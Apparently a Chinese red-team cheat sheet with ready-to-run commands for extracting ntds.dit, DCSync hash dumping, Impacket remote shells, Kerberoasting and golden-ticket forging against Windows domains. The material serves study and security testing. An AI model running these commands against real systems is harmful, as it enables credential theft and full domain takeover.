利用vssadmin工具（域管理员权限）#

vssadmin是Windows上的一个卷影拷贝服务的命令行管理工具，可用于创建和删除卷影拷贝、列出卷影拷贝的信息，显示已安装的所有卷影拷贝写入程序和提供程序，以及改变卷影拷贝的存储空间的大小等。

其适用于： Windows 10，Windows 8.1，Windows Server 2016，Windows Server 2012 R2，Windows Server 2012，Windows Server 2008 R2，Windows Server 2008

获取ntds.dit文件流程如下

• 创建C盘的卷影拷贝

vssadmin create shadow /for=C:

• 将卷影中的ntds.dit文件拷贝出来

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\ntds.dit

• 删除卷影

vssadmin delete shadow /for=C: /quiet

利用vssown.vbs脚本（域管理员权限）#

下载：https://github.com/borigue/ptscripts/blob/master/windows/vssown.vbs

该脚本本质上是通过wmi对ShadowCopy进行操作，其功能与vssadmin类似，可用于创建和删除卷影拷贝，以及启动和停止卷影拷贝服务。

操作流程如下：

• 启动脚本

cscript vssown.vbs /start

• 拷贝卷影

cscript vssown.vbs /create c

• 列出已经拷贝的卷影

cscript vssown.vbs /list

• 复制文件

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\ntds.dit

• 删除卷影

cscript vssown.vbs /delete <列出卷影时的ID>
cscript vssown.vbs /delete {D0E1B1B0-96B3-4A5E-988A-4DA2738A078D}

利用Ntdsutil.exe工具（域管理员权限）#

Ntdsutil.exe 是一个为 Active Directory 提供管理设施的命令行工具，该工具被默认安装在了域控制器上，可以在域控上直接操作，也可以通过域内机器在域控上远程操作，但是需要管理员权限。

操作流程如下：

• 创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

• 挂载快照

ntdsutil snapshot "mount <ID>" quit quit
ntdsutil snapshot "mount {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" quit quit

• 复制文件

copy C:\$SNAP_202009291002_VOLUMEC$\windows\ntds\ntds.dit c:\ntds.dit

• 卸载并删除快照

ntdsutil snapshot "mount <ID>" "delete <ID>" quit quit

ntdsutil snapshot "mount {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" "delete {f3ce5a64-11d7-4bcf-9858-81442e40d6cb}" quit quit

Ntdsutil创建IFM（域管理员权限）#

除了利用上面那种操作来获取Ntds.dit外，还可以利用Ntdsutil.exe创建媒体安装集(IFM)来用于提取NTDS.dit文件。在使用ntdsutil创建创建媒体安装集(IFM)时，会自动进行生成快照、加载、将ntds.dit、计算机的SAM和SYSTEM文件复制到目标文件夹中等操作，我们可以利用该过程获取NTDS.dit文件。

IFM利用流程如下：

• 执行如下命令

ntdsutil "ac i ntds" "ifm" "create full c:/test" q q 

test文件夹中内容

• 将ntds.dit复制出来

copy "C:\test\Active Directory\ntds.dit" C:\ntds.dit

• 最后删除test文件夹即可

利用PowerShell下的两个脚本#

Set-ExecutionPolicy Unrestricted

Copy-VSS -DestinationDir C:\

Invoke-NinjaCopy -Path <需要复制的文件> -LocalDestination <复制文件保存位置>

Import-Module .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\ntds.dit"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\system.hive"

利用Esedbexport和Ntdsxtract工具#

详细看参考文章

使用Impacket中的secretsdump（离线）#

下载地址：https://github.com/fortra/impacket

也可以运行pip安装impacket包

secretsdump.py是Impacket工具包中的一个脚本，该脚本实现了多种不需要在远程主机上执行任何代理的情况下转储机密数据的技术。对于SAM和LSA Secrets（包括缓存的凭据），我们尽可能的尝试从注册表中读取，然后将hives保存在目标系统（％SYSTEMROOT％\Temp目录）中，并从那里读取其余的数据。

secretsdump.py有一个本地选项，可以解析Ntds.dit文件并从Ntds.dit中提取哈希散列值和域信息。在此之前，我们必须获取到Ntds.dit和SYSTEM这两个文件。如果条件满足，你可以执行以下命令：

python secretsdump.py -system /目录/system.hive -ntds /目录/ntds.dit LOCAL

更多详细见impacket使用总结

mimikatz（在线）#

在目标机器上运行使用管理员运行mimikatz以及以下命令：

lsadump::dcsync /domain:xxx.com /all /csv

Invoke-DCSync（在线）#

下载：https://gist.github.com/monoxgas/9d238accd969550136db

该脚本通过Invoke-ReflectivePEinjection调用mimikatz.dll中的dcsync功能，并利用dcsync直接读取ntds.dit得到域用户密码散列值。

命令：

Import-Module .\Invoke-DCSync.ps1
Invoke-DCSync -DumpForest | ft -wrap -autosize    // 导出域内所有用户的hash
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize      // 导出域内administrator账户的hash

ntds.dit总结#

上面的各种利用工具只是一部分，还有很多其它方式，多寻找文章吧

压缩包安装#

下载压缩包并解压

然后进入压缩包目录下的examples目录，使用python3运行对应的py文件即可

python3 wmiexec.py domain/user:password@ip
python3 psexec.py domain/user@ip -hashs :NTLM

PIP安装#

python3 -m pipx install impacket

安装完成后家目录下的.local/bin/中会有对应的impacket中py文件的软链接

可选：

• 将该目录临时加入环境变量，这样就可以使用快捷命令

export PATH="$PATH:/root/.local/bin"

• 持久化加入环境变量，注销后重新登录就会自动执行脚本加入环境变量，也可以运行**<font style="color:rgb(64, 64, 64);background-color:rgb(236, 236, 236);">source /etc/profile</font>**命令为当前登录用户运行脚本（推荐）。要卸载的话毫无疑问删除脚本即可

#在/etc/profile.d/目录下创建一个脚本，脚本内容为以下内容即可
#!/bin/sh
export PATH="$PATH:/root/.local/bin"

使用例子

lookupsid.py#

通过[MS-LSAT] MSRPC接口的Windows SID bruteforcer示例，查找远程用户/组。

lookupsid.py domain/user:password@ip

Rpcdump.py#

该脚本将转储在目标上注册的RPC端点和字符串bindings列表。它也会尝试将它们与一些知名的端点进行匹配。

rpcdump.py domain/user:password@ip

Samrdump.py#

与MSRPC套件中的安全帐户管理器远程接口通信的应用程序。它将为我们列出目标系统上的用户帐户，可用资源共享以及通过此服务导出的其他敏感信息

samrdump.py domain/user:password@ip

Sniff.py#

一个简单的数据包嗅探脚本。使用pcapy库来侦听通过指定接口传输的数据包。与wireshark类似

sniff.py

Sniffer.py#

一个简单的数据包嗅探脚本，使用原始套接字来侦听与指定协议相对应的传输数据包。一样与wireshark类似

sniffer.py

Wmiquery.py#

它允许发出WQL查询并获取目标系统WMI对象的描述信息。需要学习WQL查询

wmiquery.py domain/user:password@ip

Psexec.py#

Psexec.py允许你在远程Windows系统上执行进程，复制文件，并返回处理输出结果。此外，它还允许你直接使用完整的交互式控制台执行远程shell命令（不需要安装任何客户端软件）。

#第一种
psexec.py domain/user:password@ip
#第二种
psexec.py domain/user@ip -hashs :NTLM

常用选项

-port [destination port] #指定目标SMB的端口
-codec codec #目标回显的编码，可先执行chcp.com拿到回显编码
-service-name service_name #指定创建服务的名称，默认随机
-remote-binary-name remote_binary_name #指定上传文件的名称，默认随机

该功能需要使用的账号具有管理员权限

Wmiexec.py#

它会生成一个使用Windows Management Instrumentation的半交互式shell，并以管理员身份运行。你不需要在目标服务器上安装任何的服务/代理，因此它非常的隐蔽。

与psexec.py一样需要账号为管理员，否则运行不了

wmiexec.py domain/user:password@ip

常用选项

-share SHARE #设置连接的共享路径，默认ADMIN$
-nooutput #不获取输出，没有SMB连接
-silentcommand #不运行cmd.exe，直接运行命令
-shell-type {cmd,powershell} #设置返回的Shell类型
-com-version MAJOR_VERSION:MINOR_VERSION #设置DCOM版本

atexec.py#

通过Task Scheduler服务在目标系统上执行命令，并返回输出结果。

atexec.py domain/user:password@ip systeminfo

常用选项

-session-id #SESSION_ID 使用登录的SESSION运行（无回显，不会主动调用cmd如silentcommand）
-silentcommand #不运行cmd.exe，直接运行命令

smbexec.py#

可使用密码认证、hash认证、kerberos认证。

需要注意此脚本有一些参数是硬编码的，最好使用前修改一下。还可以增加单行命令执行的功能。

smbexec.py domain/user:password@ip

常用选项

-share SHARE #自定义回显的共享路径，默认为C$
-mode {SHARE,SERVER} #设置SHARE回显或者SERVER回显，SERVER回显需要root linux
-shell-type {cmd,powershell} #设置返回的Shell类型

另外还有一些选项是硬编码的，可以去py文件中修改

dcomexec.py#

一般使用MMC20，而且DCOM有时候会遇到0x800706ba的错误，一般都是被防火墙拦截。

dcomexec.py -object MMC20 domain/user:password@ip

常用选项

-share SHARE #设置连接的共享路径，默认ADMIN$
-nooutput #不获取输出，没有SMB连接
-object [{ShellWindows,ShellBrowserWindow,MMC20}] #设置RCE利用的类型
-com-version MAJOR_VERSION:MINOR_VERSION #设置DCOM版本
-shell-type {cmd,powershell} #设置返回的Shell类型
-silentcommand #不运行cmd.exe，直接运行命令

getTGT.py#

通过认证后去DC请求TGT并保存。

获取administrator用户的TGT，TGT过期前可拿来获取其权限

getTGT.py domain/user:password -dc-ip DCip

getST.py#

通过认证后去DC请求ST并保存。

用administrator的权限获取WIN7.test.com的cifs服务的服务票据（ST）

getST.py test/administrator:'admin@123456' -dc-ip 192.168.106.155 -spn cifs/WIN7.test.com

常用选项

-impersonate IMPERSONATE    #模拟为指定的用户的权限
-additional-ticket ticket.ccache    #在委派的S4U2Proxy中添加一个可转发的服务票据
-force-forwardable  #通过CVE-2020-17049强制忽略校验票据是否可转发

getPac.py#

查询test用户的PAC，可以看到登录次数、密码错误次数之类的

getPac.py test.com/administrator:password -targetUser test

注意账号前的格式变成了test.com，且不能指定dcip，所以test.com会经过dns解析,需要在/etc/hosts中指定test.com的IP为域控IP。

GetUserSPNs.py#

查询test.com中的用户的SPN有哪些，只需要任意一个域用户即可利用，只要有用户的SPN可以请求，可以获取其TGS爆破其密码

GetUserSPNs.py test.com/administrator:'admin@123456' -target-domain test.com

常用选项

-request #请求所有用户SPN的TGS，可拿来爆破用户密码
-request-user username #请求指定用户的TGS
-usersfile USERSFILE #请求指定文件内所有用户的TGS

GetNPUsers.py#

查询域内哪些用户不需要Kerberos预身份认证，只需要任意一个域用户即可利用，只要有用户不需要Kerberos预身份认证，可以获取其AS_REQ拿来爆破其密码。

GetNPUsers.py test.com/administrator:'admin@123456'

常用选项

-request #请求不需要Kerberos预身份认证用户的TGT，可拿来爆破
-format {hashcat,john} #设置AS_REQ的爆破格式，默认hashcat
-usersfile USERSFILE #请求指定文件内所有用户的TGT
-outputfile OUTPUTFILE #向指定文件输出结果

rbcd.py#

使用条件有点多，等用到了再记录，详细将参考文章的进阶

ticketConverter.py#

不需要认证，因为这个脚本是在ccache和kirbi格式中互相转换用的脚本。

将ccache转换为kirbi，交换位置就是kirbi转换为ccache

ticketConverter.py .\administrator.ccache .\administrator.kirbi

ticketer.py#

这个脚本主要拿来伪造各种服务票据，例如银票据、金票据、钻石票据、蓝宝石票据。

ticketer.py -nthash 服务账号hash -domain-sid 域SID -domain 域名 -spn 目标服务 用户名

meterpreter伪造#

制作票据

golden_ticket_create -d <域名> -u <任意用户名> -s <Domain SID> -k <krbtgt NTLMHash> -t <ticket本地存储路径如:/tmp/krbtgt.ticket>

加载票据

kerberos_ticket_use [票据路径]